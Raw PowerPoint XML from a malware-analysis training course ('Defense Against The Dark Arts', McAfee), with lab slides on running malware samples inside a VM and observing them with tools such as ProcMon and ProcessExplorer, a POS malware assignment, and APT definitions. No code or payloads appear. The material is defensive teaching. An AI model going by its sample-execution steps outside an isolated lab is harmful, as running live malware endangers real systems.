            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271611877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malware replication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Open Desktop\malware\Week1\Class1\Lab2\Replication folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Open Sample1 folder and copy of 0012… to the desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Rename sample to &lt;something&gt;.exe and execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Using just Windows applications, what changes can we observe?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>What native applications can we use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742442" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349829926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Lab – Part 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173335701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malware replication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Tools of the trade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ProcessExplorer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ProcMon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>InstDrv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>FlyPaper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>AntiSpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Reload sample malware\Week1\Class1\Lab2\Replication\Sample1\0012… and use tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177766324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Individual Assignment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POS Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374800424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Why it exists</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Why does malware exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Who’s behind it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What are their motivations?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Defacement / Destruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Recon / Spying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Political Gain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Financial Gain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124790071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6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16"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Individual Assignment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create a snapshot of your VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open up all (behavioral) analysis tools before execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute ‘Sample X’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describe the behavior of the malware sample </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389201410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a:off x="1249407" y="1885950"/>
            <a:ext cx="6700108" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Christiaan_Beek@mcafee.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223564573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Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1787840" y="2960559"/>
            <a:ext cx="5398322" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense Against The Dark Arts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777999" y="3878645"/>
            <a:ext cx="2175566" cy="430883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Christiaan Beek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1787837" y="3327958"/>
            <a:ext cx="5398322" cy="394222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91377" tIns="45689" rIns="91377" bIns="45689" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1066"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2100" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Franklin Gothic Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="759263" indent="-298206" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="–"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1220321" indent="-230530" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="•"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1749055" indent="-300322" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="–"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2214343" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2823446" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3432549" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4041650" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4650754" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84188464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recap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Malware terms &amp; definitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Naming conventions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Online analysis services and tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Basic replication &amp; setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sample execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232919710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Assignment (questions?)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276099006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agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>APT’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Forensic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, Static, and Code analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Continue replication discussion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273661477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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Advanced Persistent Threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8001000" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Term created in 2006 by US Air-force analysts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Describes three aspects of attackers that represent their profile, intent, and structure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>– The attacker is fluent with cyber intrusion methods and administrative techniques, and is capable of crafting custom exploits and related tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>– The attacker has an objective (or mission in longer-term campaigns) and works to achieve their goals without detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> – The attacker is organized, receives instructions, is sufficiently funded to perform their (sometimes extended) operations, and is motivated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69729207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3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malware Economy - APT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" i="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
